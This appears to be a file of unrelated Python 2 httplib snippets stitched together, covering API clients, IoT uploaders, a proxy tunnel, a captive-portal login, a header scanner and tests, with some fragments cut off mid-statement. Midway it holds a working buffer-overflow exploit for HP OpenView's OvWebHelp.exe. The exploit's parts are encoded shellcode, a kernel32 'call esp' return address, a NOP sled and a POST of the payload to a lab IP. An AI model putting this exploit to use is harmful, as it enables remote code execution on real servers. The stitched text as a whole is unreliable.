def do_compile(self, params, target_filename, filenames, remove):
    """Compile JavaScript through Google's online Closure Compiler service.

    Args:
        params: Sequence of (name, value) pairs POSTed to the compiler.
        target_filename: Path the compressed output is written to on success.
        filenames: Source file names, used to map the compiler's "Input_N"
            diagnostics back to real files.
        remove: Substring stripped from the compiled output.

    Exits the process (status 1) on fatal compiler errors or if the service
    returns no compiled code.
    """
    # Send the request to Google.
    headers = {"Content-type": "application/x-www-form-urlencoded"}
    conn = httplib.HTTPConnection("closure-compiler.appspot.com")
    conn.request("POST", "/compile", urllib.urlencode(params), headers)
    response = conn.getresponse()
    json_str = response.read()
    conn.close()

    # Parse the JSON response.
    json_data = json.loads(json_str)

    def file_lookup(name):
        # The compiler names inputs "Input_1", "Input_2", ... (1-based).
        if not name.startswith("Input_"):
            return "???"
        n = int(name[6:]) - 1
        return filenames[n]

    # NOTE: dict.has_key() is deprecated (and gone in Python 3); the "in"
    # operator is byte-for-byte equivalent on Python 2.
    if "serverErrors" in json_data:
        errors = json_data["serverErrors"]
        for error in errors:
            print("SERVER ERROR: %s" % target_filename)
            print(error["error"])
    elif "errors" in json_data:
        errors = json_data["errors"]
        for error in errors:
            print("FATAL ERROR")
            print(error["error"])
            if error["file"]:
                print("%s at line %d:" % (
                    file_lookup(error["file"]), error["lineno"]))
                print(error["line"])
                print((" " * error["charno"]) + "^")
        sys.exit(1)
    else:
        if "warnings" in json_data:
            warnings = json_data["warnings"]
            for warning in warnings:
                print("WARNING")
                print(warning["warning"])
                if warning["file"]:
                    print("%s at line %d:" % (
                        file_lookup(warning["file"]), warning["lineno"]))
                    print(warning["line"])
                    print((" " * warning["charno"]) + "^")
            print()

        if "compiledCode" not in json_data:
            print("FATAL ERROR: Compiler did not return compiledCode.")
            sys.exit(1)

        code = HEADER + "\n" + json_data["compiledCode"]
        code = code.replace(remove, "")

        # Trim down Google's Apache licences.
        # The Closure Compiler used to preserve these until August 2015.
        # Delete this in a few months if the licences don't return.
        LICENSE = re.compile("""/\\* [\w ]+ (Copyright \\d+ Google Inc.) https://developers.google.com/blockly/ Licensed under the Apache License, Version 2.0 \(the "License"\); you may not use this file except in compliance with the License. 
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. \\*/""")
        code = re.sub(LICENSE, r"\n// \1 Apache License 2.0", code)

        stats = json_data["statistics"]
        original_b = stats["originalSize"]
        compressed_b = stats["compressedSize"]
        if original_b > 0 and compressed_b > 0:
            # "with" guarantees the file is closed even if write() raises.
            with open(target_filename, "w") as f:
                f.write(code)
            original_kb = int(original_b / 1024 + 0.5)
            compressed_kb = int(compressed_b / 1024 + 0.5)
            ratio = int(float(compressed_b) / float(original_b) * 100 + 0.5)
            print("SUCCESS: " + target_filename)
            print("Size changed from %d KB to %d KB (%d%%)." % (
                original_kb, compressed_kb, ratio))
        else:
            print("UNKNOWN ERROR")
def _prepare_connection(self, url, headers):
    """Return an httplib connection to *url*, honouring proxy env vars.

    HTTPS targets with an ``https_proxy`` set are tunnelled with a manual
    HTTP CONNECT handshake; HTTP targets with an ``http_proxy`` set are
    routed straight through the proxy. With no matching proxy variable the
    work is delegated to ``HttpClient._prepare_connection``.

    Args:
        url: Parsed URL object (needs .protocol, .host, .port).
        headers: Request headers; 'User-Agent' is forwarded to the proxy and
            'Proxy-Authorization' may be added in the plain-HTTP path.
    """
    proxy_auth = _get_proxy_auth()
    if url.protocol == 'https':
        # destination is https
        proxy = os.environ.get('https_proxy')
        if proxy:
            # Set any proxy auth headers
            if proxy_auth:
                proxy_auth = 'Proxy-authorization: %s' % proxy_auth
            # Construct the proxy connect command.
            port = url.port
            if not port:
                port = '443'  # default HTTPS port
            proxy_connect = 'CONNECT %s:%s HTTP/1.0\r\n' % (url.host, port)
            # Set the user agent to send to the proxy
            if headers and 'User-Agent' in headers:
                user_agent = 'User-Agent: %s\r\n' % (headers['User-Agent'])
            else:
                user_agent = ''
            # Full CONNECT preamble: request line, optional auth, optional UA.
            proxy_pieces = '%s%s%s\r\n' % (proxy_connect, proxy_auth, user_agent)
            # Find the proxy host and port.
            proxy_url = atom.url.parse_url(proxy)
            if not proxy_url.port:
                proxy_url.port = '80'
            # Connect to the proxy server, very simple recv and error checking
            p_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            p_sock.connect((proxy_url.host, int(proxy_url.port)))
            p_sock.sendall(proxy_pieces)
            response = ''
            # Wait for the full response (blank line ends the headers).
            while response.find("\r\n\r\n") == -1:
                response += p_sock.recv(8192)
            # Second token of the status line is the HTTP status code.
            p_status = response.split()[1]
            if p_status != str(200):
                raise ProxyError('Error status=%s' % str(p_status))
            # Trivial setup for ssl socket.
            # NOTE(review): socket.ssl/httplib.FakeSocket are long-deprecated
            # Python 2 APIs and perform no certificate validation.
            ssl = socket.ssl(p_sock, None, None)
            fake_sock = httplib.FakeSocket(p_sock, ssl)
            # Initalize httplib and replace with the proxy socket.
            connection = httplib.HTTPConnection(proxy_url.host)
            connection.sock = fake_sock
            return connection
        else:
            # The request was HTTPS, but there was no https_proxy set.
            return HttpClient._prepare_connection(self, url, headers)
    else:
        proxy = os.environ.get('http_proxy')
        if proxy:
            # Find the proxy host and port.
            proxy_url = atom.url.parse_url(proxy)
            if not proxy_url.port:
                proxy_url.port = '80'
            if proxy_auth:
                headers['Proxy-Authorization'] = proxy_auth.strip()
            # Plain HTTP can simply be pointed at the proxy itself.
            return httplib.HTTPConnection(proxy_url.host, int(proxy_url.port))
        else:
            # The request was HTTP, but there was no http_proxy set.
            return HttpClient._prepare_connection(self, url, headers)
import httplib, json
import time

# POST one robot-position sample to the local IoRT endpoint as JSON.
headers = {"charset": "utf-8", "Content-Type": "application/json"}
conn = httplib.HTTPConnection("localhost")

# Millisecond-precision timestamp: whole seconds go through strftime, the
# millisecond remainder is appended manually.
s, ms = divmod(int(time.time() * 1000.), 1000)
sample = {
    "r_id": 123,
    "p_time": '{}.{:03d}'.format(
        time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(s)), ms),
    "pos_x": 640.0,
    "pos_y": 380.0,
    "dir_x": 1.0,
    "dir_y": 0.0
}
# BUG FIX: ensure_ascii='False' passed the *string* 'False', which is truthy
# and therefore behaved exactly like ensure_ascii=True. Pass the boolean.
sampleJson = json.dumps(sample, ensure_ascii=False)
# Send the JSON data as-is -- we don't need to URL Encode this
conn.request("POST", "/IoRT/api/pos_w.php", sampleJson, headers)
response = conn.getresponse()
print(response.read())
def login():
    """
    Attempt to log in.

    Returns AlreadyLoggedIn if we're already logged in, InvalidCredentials
    if the username and password given are incorrect, and Successful if we
    have managed to log in. Throws an exception if an error occurs somewhere
    along the process.

    Relies on module-level ``username`` and ``password``.
    """
    logger = logging.getLogger("FirewallLogger")

    # Probe a fixed external IP; the captive firewall 303-redirects us to its
    # auth page when we are not logged in.
    # BUG FIX: each connection is now constructed *before* its try block --
    # previously, if the constructor raised, the finally clause died with an
    # unbound-name error that masked the real failure.
    conn = httplib.HTTPConnection("74.125.236.51:80")
    try:
        conn.request("GET", "/")
        response = conn.getresponse()
        # 303 leads to the auth page, so it means we're not logged in
        if (response.status != 303):
            return (LoginState.AlreadyLoggedIn, response.status)
        authlocation = response.getheader("Location")
    finally:
        conn.close()
    logger.info("The auth location is: %s" % authlocation)

    # Make a connection to the auth location
    parsedauthloc = urlparse.urlparse(authlocation)
    authconn = httplib.HTTPSConnection(parsedauthloc.netloc)
    try:
        authconn.request("GET", parsedauthloc.path + "?" + parsedauthloc.query)
        authResponse = authconn.getresponse()
        data = authResponse.read()
    finally:
        authconn.close()

    # Look for the right magic value in the data
    match = re.search(r"VALUE=\"([0-9a-f]+)\"", data)
    magicString = match.group(1)
    logger.debug("The magic string is: " + magicString)

    # Now construct a POST request with the credentials plus the magic token.
    params = urllib.urlencode({'username': username, 'password': password,
                               'magic': magicString, '4Tredir': '/'})
    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "Accept": "text/plain"}
    postconn = httplib.HTTPSConnection(parsedauthloc.netloc)
    try:
        postconn.request("POST", "/", params, headers)
        # Get the response
        postResponse = postconn.getresponse()
        postData = postResponse.read()
    finally:
        postconn.close()

    # Look for the keepalive URL
    keepaliveMatch = re.search(r"location.href=\"(.+?)\"", postData)
    if keepaliveMatch is None:
        # Whoops, unsuccessful -- probably the username and password didn't match
        logger.fatal("Authentication unsuccessful, check your username and password.")
        return (LoginState.InvalidCredentials, None)

    keepaliveURL = keepaliveMatch.group(1)
    logger.info("The keep alive URL is: " + keepaliveURL)
    logger.debug(postData)
    return (LoginState.Successful, urlparse.urlparse(keepaliveURL))
# sending "GET" request over proxy using httplib in python
import httplib

conn = httplib.HTTPConnection("10.1.1.19", 80)
# When speaking to a proxy, the request line carries the absolute URL.
# FIX: the original call read `conn.request("GET", "...", headers={...}))`
# -- an unbalanced parenthesis plus a `{...}` placeholder, i.e. not valid
# Python. Supply a real (empty) header dict; a GET has no body.
headers = {}  # TODO: fill in the request headers you need
conn.request("GET", "http://www.python.org/index.html", None, headers)
def panFetch(song, path):
    """Download one Pandora song to *path*, then queue, save, or discard it.

    Reads plugin settings for ad-size threshold, queue delay, stream quality
    and ad skipping; updates the module-level ``_high`` read-latency marker.
    """
    global _high
    # Streams at or below this many bytes are treated as advertisements.
    isad = int(_settings.getSetting('isad')) * 1024
    wait = int(_settings.getSetting('delay'))
    qual = _settings.getSetting('quality')
    skip = _settings.getSetting('skip')
    url = urlparse.urlsplit(song.audioUrl[qual])
    conn = httplib.HTTPConnection(url.netloc, timeout=9)
    conn.request('GET', "%s?%s" % (url.path, url.query))
    strm = conn.getresponse()
    size = int(strm.getheader('content-length'))
    # These two exact sizes are known "empty song" responses returned when
    # songs are requested too quickly.
    if size in (341980, 173310):  # empty song cause requesting to fast
        xbmc.log("%s.Fetch MT (%13s,%8d) '%s - %s - %s'" % (
            _plugin, _stamp, size,
            song.songId[:4], song.artist, song.title), xbmc.LOGDEBUG)
        panMsg(song, 'To Many Songs Requested')
        return
    xbmc.log("%s.Fetch %s (%13s,%8d) '%s - %s - %s'" % (
        _plugin, strm.reason, _stamp, size,
        song.songId[:4], song.artist, song.title))
    totl = 0
    qued = False
    last = time.time()
    # Unbuffered binary write so partial data reaches disk immediately.
    file = open(path, 'wb', 0)
    while (totl < size) and (not xbmc.abortRequested):
        try:
            data = strm.read(min(4096, size - totl))
        except socket.timeout:
            xbmc.log("%s.Fetch TO (%13s,%8d) '%s - %s - %s'" % (
                _plugin, _stamp, totl,
                song.songId[:4], song.artist, song.title), xbmc.LOGDEBUG)
            break
        # Track the worst observed gap between reads.
        if _high < (time.time() - last):
            _high = time.time() - last
        last = time.time()
        file.write(data)
        totl += len(data)
        # Once enough bytes have arrived to rule out an ad, schedule playback.
        if (not qued) and (size > isad):
            threading.Timer(wait, panQueue, (song, path)).start()
            qued = True
    file.close()
    conn.close()
    if totl < size:  # incomplete file
        xbmc.log("%s.Fetch RM (%13s) '%s - %s - %s'" % (
            _plugin, _stamp,
            song.songId[:4], song.artist, song.title), xbmc.LOGDEBUG)
        xbmcvfs.delete(path)
    elif size <= isad:  # looks like an ad
        if skip == 'true':
            xbmc.log("%s.Fetch AD (%13s) '%s - %s - %s'" % (
                _plugin, _stamp,
                song.songId[:4], song.artist, song.title), xbmc.LOGDEBUG)
            xbmcvfs.delete(path)
        elif qued == False:  # play it anyway
            song.artist = song.album = song.title = 'Advertisement'
            dest = path + '.ad.m4a'
            xbmcvfs.rename(path, dest)
            panQueue(song, dest)
    else:
        panSave(song, path)
# Scroll the current readings across the Sense HAT LED matrix.
sense.show_message("P: %d" % convert_pressure, text_colour=color, scroll_speed=0.08)
sense.show_message("H: %d" % humidity, text_colour=color, scroll_speed=0.08)
#sense.show_message("CPU Load %s" % cpu_pc, text_colour=color, scroll_speed=0.08)
#sense.show_message("CPU Temp %sC" % cpu_temp, text_colour=color, scroll_speed=0.08)
#sense.show_message("Free Ram %s" % mem_avail_mb, text_colour=color, scroll_speed=0.08)
time.sleep(1)
# Upload the same readings to ThingSpeak as a form-encoded POST.
headers = {
    "Content-type": "application/x-www-form-urlencoded",
    "Accept": "text/plain"
}
conn = httplib.HTTPConnection("api.thingspeak.com:80")
params = urllib.urlencode({
    'field1': convert_pressure,
    'field2': temp3,
    'field3': humidity,
    'field4': cpu_pc,
    'field5': cpu_temp,
    'field6': mem_avail_mb,
    'key': 'AAAAAAAAAAAAAAAA'  # ThingSpeak write API key
})
try:
    conn.request("POST", "/update", params, headers)
    response = conn.getresponse()
    #print strftime("%a, %d %b %Y %H:%M:%S", localtime())
    #print response.status, response.reason
    data = response.read()
    # NOTE(review): the except/finally matching this try continues beyond
    # this chunk -- confirm it closes the connection.
def check_headers(self, url, follow_redirects=0):
    """Issue a HEAD request to *url* and grade its security headers.

    Returns a dict keyed by header name whose values come from
    self.evaluate_warn() for each header actually present; {} for an
    unsupported URL scheme; False when name resolution fails. Follows
    'location' redirects recursively up to *follow_redirects* hops.
    """
    # Baseline verdicts: 'warn' = 1 marks headers whose *absence* is a
    # problem; 'warn' = 0 marks informational headers.
    retval = {
        'x-frame-options': {'defined': False, 'warn': 1, 'contents': ''},
        'strict-transport-security': {'defined': False, 'warn': 1, 'contents': ''},
        'access-control-allow-origin': {'defined': False, 'warn': 0, 'contents': ''},
        'content-security-policy': {'defined': False, 'warn': 1, 'contents': ''},
        'x-xss-protection': {'defined': False, 'warn': 1, 'contents': ''},
        'x-content-type-options': {'defined': False, 'warn': 1, 'contents': ''},
        'x-powered-by': {'defined': False, 'warn': 0, 'contents': ''},
        'server': {'defined': False, 'warn': 0, 'contents': ''}
    }
    parsed = urlparse(url)
    protocol = parsed[0]
    hostname = parsed[1]
    path = parsed[2]
    if (protocol == 'http'):
        conn = httplib.HTTPConnection(hostname)
    elif (protocol == 'https'):
        # Certificate validation is deliberately disabled for scanning.
        conn = httplib.HTTPSConnection(
            hostname, context=ssl._create_unverified_context())
    else:
        return {}
    try:
        conn.request('HEAD', path)
        res = conn.getresponse()
        headers = res.getheaders()
    except socket.gaierror:
        print '[*] Fallo la Solicitud HTTP '
        return False
    # On a 3xx answer, chase the redirect target instead (bounded recursion).
    if (res.status >= 300 and res.status < 400 and follow_redirects > 0):
        for header in headers:
            if (header[0] == 'location'):
                return self.check_headers(header[1], follow_redirects - 1)
    # Re-grade every header of interest that the server actually sent.
    for header in headers:
        if (header[0] in retval):
            retval[header[0]] = self.evaluate_warn(header[0], header[1])
    return retval
import httplib conn = httplib.HTTPConnection("shorturl.baiku.cn") conn.request("GET", "/?url=http://www.baidu.com/") r1 = conn.getresponse() print r1.status, r1.reason data1 = r1.read() print data1 conn.close()
def measure_send():
    """Sending values to ThingSpeak.

    Collects CPU temperature and load averages, optionally the DHT11 room
    temperature/humidity, and POSTs them to the ThingSpeak /update API.
    Mutates the module-level previousTemperature/previousHumidity used by
    validateDHT(); all diagnostics are gated on the -d debug flag.
    """
    global previousTemperature
    global previousHumidity
    # get CPU temperature (sysfs reports millidegrees C)
    tempCPU = int(open('/sys/class/thermal/thermal_zone0/temp').read()) / 1e3
    if all_args.d:
        print("[THINKGSPEAK] CPU temperature:", tempCPU)
    # get load averages (fixed-width slices of /proc/loadavg)
    loadAll = open('/proc/loadavg').read()
    load1 = loadAll[0:4]
    load5 = loadAll[5:9]
    load15 = loadAll[10:14]
    if all_args.d:
        print("[THINKGSPEAK] Average-1:", load1, "Average-5:", load5,
              "Average-15:", load15)
    try:
        # get room temperature & humidity
        humRoom, tempRoom = Adafruit_DHT.read_retry(Adafruit_DHT.DHT11, DHTpin)
        if all_args.d:
            print("[THINKGSPEAK] FIRST measuremet T:", tempRoom, "H:", humRoom)
            print("[THINKGSPEAK] previousTemperature:", previousTemperature,
                  "previousHumidity:", previousHumidity)
        # 100 is the sentinel for "no previous reading yet".
        if previousHumidity == 100 or previousTemperature == 100:
            if all_args.d:
                print("[THINKGSPEAK] initialising 'previous' values")
            previousHumidity = humRoom
            previousTemperature = tempRoom
        humidityRoom, temperatureRoom = validateDHT(humRoom, tempRoom)
        if all_args.d:
            print("[THINKGSPEAK] >>>> VALIDATED measurement T:",
                  temperatureRoom, "H:", humidityRoom)
        # Parameters WITH DHT11
        if sys.version_info[0] < 3:  # Python 2.7
            params = urllib.urlencode({
                'field1': temperatureRoom, 'field2': humidityRoom,
                'field3': tempCPU, 'field4': load1, 'field5': load5,
                'field6': load15, 'key': key
            })
        else:  # Python 3
            params = urllib.parse.urlencode({
                'field1': temperatureRoom, 'field2': humidityRoom,
                'field3': tempCPU, 'field4': load1, 'field5': load5,
                'field6': load15, 'key': key
            })
    except Exception:  # narrowed from a bare except: don't trap SystemExit/^C
        print("[THINKGSPEAK] Failed to read DHT11 !")
        # Parameters WITHOUT DHT11
        if sys.version_info[0] < 3:  # Python 2.7
            params = urllib.urlencode({
                'field3': tempCPU, 'field4': load1, 'field5': load5,
                'field6': load15, 'key': key
            })
        else:  # Python 3
            params = urllib.parse.urlencode({
                'field3': tempCPU, 'field4': load1, 'field5': load5,
                'field6': load15, 'key': key
            })
    # BUG FIX: the header key was misspelled "Content-typZZe", so the form
    # data was sent without a valid Content-Type declaration.
    headers = {
        "Content-type": "application/x-www-form-urlencoded",
        "Accept": "text/plain"
    }
    if sys.version_info[0] < 3:
        conn = httplib.HTTPConnection("api.thingspeak.com:80")
    else:
        conn = http.client.HTTPConnection("api.thingspeak.com:80")
    try:
        conn.request("POST", "/update", params, headers)
        response = conn.getresponse()
        if all_args.d:
            print("[THINKGSPEAK] connection to Thingspeak:",
                  response.status, response.reason)
        conn.close()
    except Exception:  # narrowed from a bare except
        if all_args.d:
            print("[THINKGSPEAK] connection to Thingspeak failed !")
def serverJsonPost(self, json):
    """POST a JSON payload to the MRDS differential-drive endpoint.

    Used for commanding wheel speeds; returns the raw httplib response.
    """
    connection = httplib.HTTPConnection(self.server)
    connection.request('POST', '/lokarria/differentialdrive', json, HEADERS)
    return connection.getresponse()
# Characters stripped out when turning arbitrary text into Solr keys.
to_drop = set(''';/?:@&=+$,<>#%"{}|\\^[]`\n\r''')

def str_to_key(s):
    # Lower-case, drop URL-hostile characters, and map spaces to underscores.
    return ''.join(c if c != ' ' else '_' for c in s.lower() if c not in to_drop)

def solr_post(h1, body):
    # POST an XML command to Solr over the shared connection and return the
    # HTTP reason phrase. `connect` and `update_url` are module globals
    # defined elsewhere in the file -- TODO confirm.
    if not connect:
        return 'not connected'
    h1.request('POST', update_url, body, {
        'Content-type': 'text/xml;charset=utf-8'})
    response = h1.getresponse()
    response.read()  # drain the body so the keep-alive connection is reusable
    return response.reason

# Wipe and compact the index before (re)loading, but only when connected.
h1 = None
if connect:
    h1 = httplib.HTTPConnection(solr_host)
    h1.connect()
    print solr_post(h1, '<delete><query>*:*</query></delete>')
    print solr_post(h1, '<commit/>')
    print solr_post(h1, '<optimize/>')

def add_field(doc, name, value):
    # Append one <field name="...">value</field> element to doc, cleaning
    # characters Solr rejects via strip_bad_char (defined elsewhere).
    field = Element("field", name=name)
    field.text = unicode(strip_bad_char(value))
    doc.append(field)

def add_field_list(doc, name, field_list):
    # Add one field per value, all under the same field name.
    for value in field_list:
        add_field(doc, name, value)

# Control characters that are illegal in XML payloads.
re_bad_char = re.compile('[\x01\x19-\x1e]')
def __init__(self, base_url):
    """Open an HTTP client connection to *base_url* on port 80 (30 s timeout)."""
    connection = httplib.HTTPConnection(base_url, 80, timeout=30)
    self.httpClient = connection
# coding=utf8 import httplib cookie = 'u="2|1:0|10:1506671668|1:u|32:NTljZGZhZDU1MTE1OWEyODRlZWViYzQw|b73bf9a0c49bc6e2213a58b12dec2e0d94fc0d42f1ff9f30dfa51335e2a00a77"' base = 'localhost' # base = 'n01.me-yun.com' path = '/1.0/thirdpush/push' body = '{"userid":"59dc6266ca714327af2e4e85","action":"assignedBought","otherid":"59f1a6beca71434dd657f822"}' try: header = {'X-MeCloud-Debug': 1} # 'Cookie': cookie, print header httpClient = httplib.HTTPConnection(base, 8000, timeout=30) httpClient.request("POST", path, body, header) response = httpClient.getresponse() print response.status print response.reason print response.read() # print response.msg # print response.getheaders() except Exception, e: print e finally: if httpClient: httpClient.close()
    # (continuation of the shellcode string literal `sc` opened earlier in
    # the file -- the opening assignment lies before this chunk)
    "\x46\x36\x43\x66\x46\x33\x43\x66\x51\x78\x44\x39\x48\x4c\x47"
    "\x4f\x4c\x46\x4b\x4f\x4b\x65\x4e\x69\x4d\x30\x42\x6e\x50\x56"
    "\x43\x76\x49\x6f\x46\x50\x43\x58\x44\x48\x4d\x57\x47\x6d\x51"
    "\x70\x49\x6f\x4a\x75\x4d\x6b\x4c\x30\x4c\x75\x4f\x52\x43\x66"
    "\x42\x48\x4d\x76\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x48\x55\x47"
    "\x4c\x47\x76\x43\x4c\x45\x5a\x4b\x30\x4b\x4b\x4d\x30\x44\x35"
    "\x43\x35\x4f\x4b\x51\x57\x42\x33\x51\x62\x50\x6f\x43\x5a\x45"
    "\x50\x42\x73\x49\x6f\x4a\x75\x46\x6a\x41\x41")
# 57 filler bytes reach the saved return address; data2 pads the second
# form parameter.
data = "A" * 57
data2 = "B" * 5000
# Overwrite the return address (bytes are little-endian, i.e. 0x77e5f2df --
# presumably a "call esp" gadget in kernel32.dll per the original note),
# then NOP-sled into the shellcode.
ret = "\xDF\xf2\xe5\x77" + "\x90" * 254 + sc  # call esp kernel32.dll
payload = data + ret
p = urllib.urlencode({'Topic': payload, 'Target': data2})
h = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "text/html",
    "User-Agent": "BackTrack",
    "Accept-Language": "en"
}
c = httplib.HTTPConnection('172.16.29.130')
c.request("POST", "/OvCgi/OvWebHelp.exe", p, h)
r = c.getresponse()
print r.status, r.reason
c.close()
print "\nDone\n"
import httplib
import urllib2

# http get request with headers
# FIX: `host = #http server` assigned nothing (a bare comment), which is a
# syntax error. Give it a placeholder value until the real server is known.
host = "www.example.com"  # TODO: set the target HTTP server
headers = {"Content-Type": "text/html",
           "Accept-Encoding": "text/plain",
           "User-Agent": "Mozilla/5.0 (x11; Ubuntu; Linux x86_64) like Gecko"}
conn = httplib.HTTPConnection(host)
# FIX: the original passed " " placeholders for both the URL and the body.
# A GET carries no body (None); add content/body and parameters here.
conn.request("GET", "/", None, headers)
def test_create_table(self, mock_create_table):
    """POST a CreateTable request and compare the JSON reply field-by-field.

    The storage layer is mocked out: mock_create_table returns a canned
    TableMeta, so the test exercises only the HTTP/JSON frontend mapping.
    """
    # Canned backend answer: a Thread table keyed on (ForumName, Subject)
    # with one local secondary index, already ACTIVE.
    mock_create_table.return_value = models.TableMeta(
        models.TableSchema(attribute_type_map={
            "ForumName": models.AttributeType('S'),
            "Subject": models.AttributeType('S'),
            "LastPostDateTime": models.AttributeType('S')
        }, key_attributes=["ForumName", "Subject"],
            index_def_map={
                "LastPostIndex": models.IndexDefinition(
                    "ForumName", "LastPostDateTime")
            }), models.TableMeta.TABLE_STATUS_ACTIVE)
    conn = httplib.HTTPConnection('localhost:8080')
    # Raw DynamoDB-style CreateTable request body.
    body = """ { "attribute_definitions": [ { "attribute_name": "ForumName", "attribute_type": "S" }, { "attribute_name": "Subject", "attribute_type": "S" }, { "attribute_name": "LastPostDateTime", "attribute_type": "S" } ], "table_name": "Thread", "key_schema": [ { "attribute_name": "ForumName", "key_type": "HASH" }, { "attribute_name": "Subject", "key_type": "RANGE" } ], "local_secondary_indexes": [ { "index_name": "LastPostIndex", "key_schema": [ { "attribute_name": "ForumName", "key_type": "HASH" }, { "attribute_name": "LastPostDateTime", "key_type": "RANGE" } ], "projection": { "projection_type": "KEYS_ONLY" } } ] } """
    # NOTE(review): the request asks for KEYS_ONLY projection while the
    # expected reply says ALL -- presumably exercising a server-side default;
    # confirm this is intentional.
    expected_response = {
        'table_description': {
            'attribute_definitions': [{
                'attribute_name': 'Subject',
                'attribute_type': 'S'
            }, {
                'attribute_name': 'LastPostDateTime',
                'attribute_type': 'S'
            }, {
                'attribute_name': 'ForumName',
                'attribute_type': 'S'
            }],
            'creation_date_time': 0,
            'item_count': 0,
            'key_schema': [{
                'attribute_name': 'ForumName',
                'key_type': 'HASH'
            }, {
                'attribute_name': 'Subject',
                'key_type': 'RANGE'
            }],
            'local_secondary_indexes': [{
                'index_name': 'LastPostIndex',
                'index_size_bytes': 0,
                'item_count': 0,
                'key_schema': [{
                    'attribute_name': 'ForumName',
                    'key_type': 'HASH'
                }, {
                    'attribute_name': 'LastPostDateTime',
                    'key_type': 'RANGE'
                }],
                'projection': {
                    'projection_type': 'ALL'
                }
            }],
            'table_name': 'Thread',
            'table_size_bytes': 0,
            'table_status': 'ACTIVE',
            'links': [{
                'href': self.table_url,
                'rel': 'self'
            }, {
                'href': self.table_url,
                'rel': 'bookmark'
            }]
        }
    }
    conn.request("POST", self.url, headers=self.headers, body=body)
    response = conn.getresponse()
    # The backend mock must have been invoked by the handler.
    self.assertTrue(mock_create_table.called)
    json_response = response.read()
    response_payload = json.loads(json_response)
    self.assertEqual(expected_response, response_payload)
def callm(method, param_dict, POST=False, socket_timeout=None, data=None):
    """ Call the api! Param_dict is a *regular* *python* *dictionary* so if you want to have multi-valued params put them in a list. ** note, if we require 2.6, we can get rid of this timeout munging. """
    try:
        param_dict['api_key'] = config.ECHO_NEST_API_KEY
        param_list = []
        if not socket_timeout:
            socket_timeout = config.CALL_TIMEOUT
        # Flatten the dict into (key, value) pairs; a list value becomes one
        # pair per element, None values are dropped, unicode is UTF-8 encoded.
        for key, val in param_dict.iteritems():
            if isinstance(val, list):
                param_list.extend([(key, subval) for subval in val])
            elif val is not None:
                if isinstance(val, unicode):
                    val = val.encode('utf-8')
                param_list.append((key, val))
        params = urllib.urlencode(param_list)
        # Temporarily override the process-wide socket timeout (the
        # "timeout munging" the docstring apologises for).
        orig_timeout = socket.getdefaulttimeout()
        socket.setdefaulttimeout(socket_timeout)
        if (POST):
            if (not method == 'track/upload') or ((method == 'track/upload') and 'url' in param_dict):
                """ this is a normal POST call """
                url = 'http://%s/%s/%s/%s' % (config.API_HOST, config.API_SELECTOR,
                                              config.API_VERSION, method)
                if data is None:
                    data = ''
                data = urllib.urlencode(data)
                data = "&".join([data, params])
                f = opener.open(url, data=data)
            else:
                """ upload with a local file is special, as the body of the request is the content of the file, and the other parameters stay on the URL """
                url = '/%s/%s/%s?%s' % (config.API_SELECTOR, config.API_VERSION,
                                        method, params)
                if ':' in config.API_HOST:
                    host, port = config.API_HOST.split(':')
                else:
                    host = config.API_HOST
                    port = 80
                if config.TRACE_API_CALLS:
                    logger.info("%s/%s" % (host+':'+str(port), url,))
                conn = httplib.HTTPConnection(host, port = port)
                # NOTE(review): `headers` here is a module-level name defined
                # outside this block -- confirm it is a list of pairs.
                conn.request('POST', url, body = data,
                             headers = dict([('Content-Type', 'application/octet-stream')]+headers))
                f = conn.getresponse()
        else:
            """ just a normal GET call """
            url = 'http://%s/%s/%s/%s?%s' % (config.API_HOST, config.API_SELECTOR,
                                             config.API_VERSION, method, params)
            f = opener.open(url)
        # Restore the process-wide timeout before parsing the response.
        socket.setdefaulttimeout(orig_timeout)
        # try/except
        response_dict = get_successful_response(f)
        return response_dict
    except IOError, e:
        # urllib2 errors expose either .reason (connection-level) or .code
        # (HTTP status); map both onto the package's own exception type.
        if hasattr(e, 'reason'):
            raise EchoNestIOError(error=e.reason)
        elif hasattr(e, 'code'):
            raise EchoNestIOError(code=e.code)
        else:
            raise
def run(self):
    """Stress-test worker: repeatedly GET self.uri for self.duration seconds.

    Each response is validated (status 200, sane content-length, full body
    received) and its throughput printed; the loop stops on the first
    failure or when the time budget is exhausted.
    """
    result = True
    error = ''
    start_time = time.time()
    conn = httplib.HTTPConnection(self.host, self.port)
    num = 0
    while result and ((time.time() - start_time) < self.duration):
        buflen = 0
        try:
            exp_start = time.time()
            # Tag each request so the server side can correlate it.
            conn.request("GET", self.uri, None,
                         {'X-Stress': '%d-%d' % (self.identifier, num)})
            num += 1
            resp = conn.getresponse()
            if int(resp.status) != 200:
                error = '(Status = %d)' % (resp.status)
                result = False
            else:
                givenlength = resp.getheader('content-length')
                mimetype = resp.getheader('content-type')
                if not givenlength:
                    error = '(No content-length given)'
                    result = False
                elif not givenlength.isdigit():
                    error = '(Invalid content-length)'
                    result = False
                else:
                    givenlength = int(givenlength)
                    buflen = 0
                    # Drain the body in chunks, counting bytes received.
                    while True:
                        buf = resp.read(65000)
                        if len(buf) > 0:
                            buflen += len(buf)
                        else:
                            # Stream ended early: body shorter than promised.
                            error = "(Expected %d bytes got %d bytes)" % (
                                givenlength, buflen)
                            result = False
                            break
                        if buflen >= givenlength:
                            break
        except:
            error = sys.exc_info()[1]
            result = False
        elapsedtime = time.time() - exp_start
        if buflen == 0 or elapsedtime == 0:
            throughput = 0.00
        else:
            throughput = (8 * buflen / elapsedtime)  # bits per second
        if throughput > 1000000:
            throughput = throughput / 1000000
            units = "Mbps"
        else:
            throughput = throughput / 1000
            units = "Kbps"
        # Trailing comma keeps [OK]/[FAILED] on the same output line.
        print " Thread %d finished download %d in %5.2f sec, throughput = %6.2f (%s)" % (
            self.identifier, num - 1, elapsedtime, throughput, units),
        if result:
            print "[OK]"
        else:
            print "[FAILED]", error
        sys.stdout.flush()
import platform
import subprocess
import netaddr
import httplib
import ctypes
import ctypes.util
from pyroute2 import NetlinkError
from pyroute2 import IPRoute
from nose.plugins.skip import SkipTest
from nose.tools import make_decorator
from distutils.version import LooseVersion

